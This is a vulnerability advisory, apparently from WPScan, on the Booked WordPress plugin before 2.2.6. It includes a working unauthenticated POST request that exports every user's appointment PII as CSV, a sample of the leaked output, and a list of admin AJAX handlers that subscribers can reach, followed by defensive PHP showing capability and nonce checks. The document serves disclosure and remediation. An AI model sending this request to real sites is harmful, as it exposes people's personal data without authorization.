Booked < 2.2.6 - Broken Authentication to Export Users Data in CSV



Description
The plugin allows users to book appointments by providing PII such as email, name, phone number and a personal message. The vulnerability allows anyone to dump all user records and their appointment details as CSV without authentication.

The user is also registered as a WP user after submitting an appointment, which introduces further vulnerabilities: a subscriber can approve, delete or modify any appointment and inject stored XSS.

Edit (WPScanTeam):
February 7th, 2020 - Report Received & Envato Contacted
February 7th, 2020 - Envato Investigating
February 29th, 2020 - v2.2.6 released, fixing the issues

Proof of Concept
The following request, sent as an unauthenticated user, dumps all user appointment details as CSV:

======================
Request Header (Start)
======================
POST /wp-admin/admin-post.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close

booked_export_appointments_csv=
====================
Request Header (End)
====================

The response to the above request contains PII and looks like the following:

"First Name","Last Name",Email,Calendar,Date,"Start Time","End Time","Combined Date/Time","Custom Field Data"
noman,riffat,example@example.com,"Custom Calendar","February 7, 2020","8:00 am","9:00 am","February 9, 2020 from 8:00 am to 9:00 am","hello this is a private message"

After submitting an appointment the user is registered as a subscriber, so they can perform the following actions, which are intended for administrators only. The handlers are registered on wp_ajax_ hooks, which WordPress fires for any logged-in user regardless of role, so without a capability check inside each handler a subscriber can invoke them:

add_action('wp_ajax_booked_admin_add_appt', array(&$this,'booked_admin_add_appt'));
add_action('wp_ajax_booked_admin_edit_appt', array(&$this,'booked_admin_edit_appt'));
add_action('wp_ajax_booked_admin_delete_custom_timeslot', array(&$this,'booked_admin_delete_custom_timeslot'));
add_action('wp_ajax_booked_admin_adjust_custom_timeslot_count', array(&$this,'booked_admin_adjust_custom_timeslot_count'));
add_action('wp_ajax_booked_admin_add_custom_timeslot', array(&$this,'booked_admin_add_custom_timeslot'));
add_action('wp_ajax_booked_admin_add_custom_timeslots', array(&$this,'booked_admin_add_custom_timeslots'));
add_action('wp_ajax_booked_admin_save_custom_time_slots', array(&$this,'booked_admin_save_custom_time_slots'));
add_action('wp_ajax_booked_admin_save_custom_fields', array(&$this,'booked_admin_save_custom_fields'));
add_action('wp_ajax_booked_admin_add_timeslots', array(&$this,'booked_admin_add_timeslots'));
add_action('wp_ajax_booked_admin_add_timeslot', array(&$this,'booked_admin_add_timeslot'));
add_action('wp_ajax_booked_admin_clear_timeslots', array(&$this,'booked_admin_clear_timeslots'));
add_action('wp_ajax_booked_admin_adjust_default_timeslot_count', array(&$this,'booked_admin_adjust_default_timeslot_count'));
add_action('wp_ajax_booked_admin_delete_timeslot', array(&$this,'booked_admin_delete_timeslot'));
add_action('wp_ajax_booked_admin_delete_appt', array(&$this,'booked_admin_delete_appt'));
add_action('wp_ajax_booked_admin_approve_appt', array(&$this,'booked_admin_approve_appt'));
add_action('wp_ajax_booked_admin_approve_all', array(&$this,'booked_admin_approve_all'));
add_action('wp_ajax_booked_admin_delete_all', array(&$this,'booked_admin_delete_all'));
add_action('wp_ajax_booked_admin_delete_past', array(&$this,'booked_admin_delete_past'));
add_action('wp_ajax_booked_date_formatting', array(&$this,'booked_date_formatting'));
add_action('wp_ajax_booked_admin_disable_slot', array(&$this,'booked_admin_disable_slot'));

add_action('wp_ajax_booked_admin_load_timeslots', array(&$this,'booked_admin_load_timeslots'));
add_action('wp_ajax_booked_admin_load_full_timeslots', array(&$this,'booked_admin_load_full_timeslots'));
add_action('wp_ajax_booked_admin_load_full_customfields', array(&$this,'booked_admin_load_full_customfields'));
add_action('wp_ajax_booked_admin_calendar_picker', array(&$this,'booked_admin_calendar_picker'));
add_action('wp_ajax_booked_admin_calendar_month', array(&$this,'booked_admin_calendar_month'));
add_action('wp_ajax_booked_admin_calendar_date', array(&$this,'booked_admin_calendar_date'));
add_action('wp_ajax_booked_admin_refresh_date_square', array(&$this,'booked_admin_refresh_date_square'));
add_action('wp_ajax_booked_admin_user_info_modal', array(&$this,'booked_admin_user_info_modal'));
add_action('wp_ajax_booked_admin_new_appointment_form', array(&$this,'booked_admin_new_appointment_form'));
add_action('wp_ajax_booked_admin_custom_timeslots_list', array(&$this,'booked_admin_custom_timeslots_list'));
add_action('wp_ajax_booked_admin_get_timeslots_select', array(&$this,'booked_admin_get_timeslots_select'));
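
As an added example (not the plugin's or WPScan's code) covering both the unauthenticated CSV export above and the admin-only wp_ajax_ handlers just listed, here is the guard pattern a WordPress handler needs: a capability check plus a nonce check in the handler itself, since neither admin_post_ nor wp_ajax_ hooks imply authorization. The hook names, the manage_options capability and the nonce names are assumptions.

```php
<?php
// Added example, not the Booked plugin's own code. Hook/action names, the
// 'manage_options' capability and the nonce names are assumptions.

// Pure CSV writer: returns the CSV text for a list of appointment rows so it
// can be exercised without touching HTTP headers.
function example_appointments_csv( array $rows ) {
    $fh = fopen( 'php://temp', 'r+' );
    fputcsv( $fh, array( 'First Name', 'Last Name', 'Email', 'Date' ) );
    foreach ( $rows as $row ) {
        fputcsv( $fh, $row ); // fputcsv() quotes fields containing commas/quotes
    }
    rewind( $fh );
    $csv = stream_get_contents( $fh );
    fclose( $fh );
    return $csv;
}

// admin_post_{action} fires for ANY logged-in user, and admin_post_nopriv_
// would fire for anonymous visitors, so neither hook implies authorization:
// the handler itself must check capability and nonce before exporting PII.
add_action( 'admin_post_example_export_csv', 'example_export_csv' );
function example_export_csv() {
    if ( ! current_user_can( 'manage_options' ) ) { // false for anonymous too
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'example_export_csv' ); // dies on a bad/missing nonce
    $rows = array(); // constructed placeholder: load real appointments here
    header( 'Content-Type: text/csv; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="appointments.csv"' );
    echo example_appointments_csv( $rows );
    exit;
}

// wp_ajax_{action} likewise runs for every authenticated role, subscribers
// included, so an "admin" action is only admin-only if the handler checks.
add_action( 'wp_ajax_example_approve_appt', 'example_approve_appt' );
function example_approve_appt() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'example_approve_appt', 'nonce' ); // 'nonce' POST field
    $appt_id = absint( $_POST['appt_id'] ?? 0 );
    if ( 0 === $appt_id ) {
        wp_send_json_error( 'missing appt_id', 400 );
    }
    // ... mark appointment $appt_id approved here ...
    wp_send_json_success( array( 'id' => $appt_id ) );
}
```

The nonce values are issued to the admin UI with wp_create_nonce() for the same action names, so a request forged from a subscriber session fails both the capability and the nonce check.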

Affects Plugin

Fixed in version 2.2.6

References

URL https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968
URL http://boxyupdates.com/changelog.php?p=booked

Classification

Type BYPASS

Miscellaneous

Original Researcher Noman Riffat
Submitter Noman Riffat
Submitter Twitter nomanriffat
Views 1615
Verified Yes
WPVDB ID 10107

Timeline

Publicly Published 2020-02-29
Added 2020-03-02
Last Updated 2020-03-03
